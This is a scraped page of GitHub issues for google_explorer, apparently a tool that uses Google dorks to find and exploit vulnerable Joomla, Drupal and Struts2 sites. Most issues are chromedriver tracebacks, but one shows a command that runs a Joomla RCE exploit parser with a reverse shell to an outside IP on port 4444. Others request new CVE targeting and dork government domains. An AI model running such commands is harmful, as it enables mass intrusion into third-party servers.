Git Product home page Git Product logo

google_explorer's Issues

Drupal 7.X

Hi anarcoder !

Sorry to bother you again. Do you think you could add support for Drupal 7.X servers ? Right now it's accurate for Drupal 8.X.

Thanks

License

Hello,

I'd like to add your tool into ArchStrike but it looks like your tool doesn't have a license.

Can you add a license file?

google_explorer

Traceback (most recent call last):
File "google_explorer.py", line 318, in
main()
File "google_explorer.py", line 313, in main
myScan = GoogleScanner(dork, browser, filters)
File "google_explorer.py", line 82, in init
self.driver = self.validate_browser()
File "google_explorer.py", line 106, in validate_browser
driver = webdriver.Chrome(chrome_options=opts)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/chrome/webdriver.py", line 69, in init
desired_capabilities=desired_capabilities)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 90, in init
self.start_session(desired_capabilities, browser_profile)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 177, in start_session
response = self.execute(Command.NEW_SESSION, capabilities)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.WebDriverException: Message: unknown error: Chrome failed to start: crashed
(Driver info: chromedriver=2.20.353124 (035346203162d32c80f1dce587c8154a1efa0c3b),platform=Linux 4.8.0-kali1-amd64 x86_64)

Unable to run google explorer !

Hello
Im getting this error when i run google explorer :

Message: unknown error: no chrome binary at /usr/bin/google-chrome-stable
(Driver info: chromedriver=2.29.461591 (62ebf098771772160f391d75e589dc567915b233),platform=Windows NT 6.1.7601 SP1 x86_64)

script doesn't write output to results_google_search.txt

hello,

script google_explorer.py doesn't write output of parsed links to results_google_search.txt..

what could be wrong?
stop working, decided to do fresh OS install, install python 3.6.0 and its deps but does not save results...

Thanks

python3 google_explorer.py

111111

python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
Traceback (most recent call last):
File "google_explorer.py", line 324, in
main()
File "google_explorer.py", line 319, in main
myScan = GoogleScanner(dork, browser, filters)
File "google_explorer.py", line 88, in init
self.driver = self.validate_browser()
File "google_explorer.py", line 112, in validate_browser
driver = webdriver.Chrome(chrome_options=opts)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/chrome/webdriver.py", line 69, in init
desired_capabilities=desired_capabilities)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 90, in init
self.start_session(desired_capabilities, browser_profile)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 177, in start_session
response = self.execute(Command.NEW_SESSION, capabilities)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.WebDriverException: Message: unknown error: Chrome failed to start: crashed
(Driver info: chromedriver=2.20.353124 (035346203162d32c80f1dce587c8154a1efa0c3b),platform=Linux 4.8.0-kali1-amd64 x86_64)

results inside results_google_search.txt are not complete

Hi!

When saving the results, google_explorer.py doesn't save the complete URLs (see the dots ...);

https://www.ibm.com/support/.../th/...9.../tasks-57.xhtml https://www.ibm.com/support/.../ko/...9.5.../help.xhtml https://www.ibm.com/support/.../fi/...7.../tasks-53.xhtml https://www.ibm.com/support/.../zh.../tasks-53.xhtml https://www.ibm.com/support/.../no/...9.5.../help.xhtml https://delivery04.dhe.ibm.com/.../8001-12C-22C--8005-12... https://www.ibm.com/support/.../da/...9.5.../help.xhtml

I've tried with FireFox and Chrome but same results.

Any help resolving this issue would be very appreciated,

Thanks :)

Google captcha (20 secs)

Would there be a way to put more then 20 seconds before the captcha times out and automatically close the browser when performing a search ?

Very nice project by the way.

Thanks,

syrius01

CVE-2018-11776

Hi my friend :)

I was wondering if you could add a feature in this awesome tool for CVE-2018-11776? It would be very appreciated !

Thanks

ImportError: No module named docopt

python google_explorer.py Traceback (most recent call last): File "google_explorer.py", line 64, in <module> from docopt import docopt, DocoptExit ImportError: No module named docopt

Issue when running python3 google-explorer.py

            eXPloReR - v0.1 - 2016                ::,:     ,::,
            anarcoder at protonmail.com               ,,:,,.,:,::
                github.com/anarcoder                  `:,,:,:,,,`
                                                        ::::,:,

Traceback (most recent call last):
File "google_explorer.py", line 56, in
from xpl_filters.xpl_filter import XplFilter
ImportError: No module named xpl_filters.xpl_filter

Thanks for your time !

Issue when running python3 google_explorer.py --xpl_filter='apache_rce_struts2_cve_2017_5638'

I've got all the URLs in "results_google_search.txt"

Here's the error message I get :

python3 google_explorer.py --xpl_filter='apache_rce_struts2_cve_2017_5638'
Traceback (most recent call last):
File "google_explorer.py", line 376, in
main()
File "google_explorer.py", line 366, in main
Apply_Xpl_Filters = XplFilter(xpl_filters)
File "/home/sirius/sploits/google/google_explorer/xpl_filters/xpl_filter.py", line 14, in init
self.exploits = self.validate_xpl_filters()
File "/home/sirius/sploits/google/google_explorer/xpl_filters/xpl_filter.py", line 18, in validate_xpl_filters
xpl_list = [''.join(file.name.split('.')[0]) for file in os.scandir(
AttributeError: 'module' object has no attribute 'scandir'

Thanks for your help !

Message: unknown error: Chrome failed to start: crashed

Hi mate, some reason It wont run - _ I have tried multiple things but still no joy. Any ideas?

`┌─[✗]─[root@reb00t]─[~/git/google_explorer]
└──╼ #python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="195.154.105.247" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
Traceback (most recent call last):
File "google_explorer.py", line 350, in
main()
File "google_explorer.py", line 346, in main
myScan = GoogleScanner(dork, browser, filters)
File "google_explorer.py", line 97, in init
self.driver = self.validate_browser()
File "google_explorer.py", line 121, in validate_browser
driver = webdriver.Chrome(chrome_options=opts)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/chrome/webdriver.py", line 69, in init
desired_capabilities=desired_capabilities)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 90, in init
self.start_session(desired_capabilities, browser_profile)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 177, in start_session
response = self.execute(Command.NEW_SESSION, capabilities)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/usr/local/lib/python3.5/dist-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.WebDriverException: Message: unknown error: Chrome failed to start: crashed
(Driver info: chromedriver=2.21.371461 (633e689b520b25f3e264a2ede6b74ccc23cb636a),platform=Linux 4.6.0-parrot-amd64 x86_64)

`

unable to use script using putty ssh shell

hi, i tried your script with Ubuntu 16.04.2 LTS python 3.6.0
im using a ssh shell via putty, when i type on the shell
google-chrome-stable
i get the error:

[29093:29093:0511/060639.952416:ERROR:browser_main_loop.cc(279)] Gtk: cannot open display:

furthermore while trying to run the script i get the msg:

[#] Error [#]: Error while using chromedriver.

These are some possible solutions for this issue:

Message: unknown error: Chrome failed to start: exited abnormally
(Driver info: chromedriver=2.10.267518,platform=Linux 4.4.0-62-generic x86_64)

my question is, is it possible to run your script under a ssh shell?
thanks.

google_explorer.py

aaaa

Traceback (most recent call last):
File "google_explorer.py", line 318, in
main()
File "google_explorer.py", line 313, in main
myScan = GoogleScanner(dork, browser, filters)
File "google_explorer.py", line 82, in init
self.driver = self.validate_browser()
File "google_explorer.py", line 106, in validate_browser
driver = webdriver.Chrome(chrome_options=opts)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/chrome/webdriver.py", line 69, in init
desired_capabilities=desired_capabilities)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 90, in init
self.start_session(desired_capabilities, browser_profile)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 177, in start_session
response = self.execute(Command.NEW_SESSION, capabilities)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.WebDriverException: Message: unknown error: Chrome failed to start: crashed
(Driver info: chromedriver=2.20.353124 (035346203162d32c80f1dce587c8154a1efa0c3b),platform=Linux 4.8.0-kali1-amd64 x86_64)

chromedriver error not working

python google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"

[#] Error [#]: Error while using chromedriver.
These are some possible solutions for this issue:
Please install/update chormedriver. Check out this link for help: https://developers.supportbee.com/blog/setting-up-cucumber-to-run-with-Chrome-on-Linux/

  • Do not run the tool as root user, like is described in this issue: #2
    Message: unknown error: Chrome failed to start: exited abnormally
    (Driver info: chromedriver=2.20.353124 (035346203162d32c80f1dce587c8154a1efa0c3b),platform=Linux 3.11.0-15-generic x86_64)
    i instaled chromedriver
    locate chromedriver
    ./etc/ppp/chromedriver_linux64.zip
    ./usr/bin/chromedriver

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.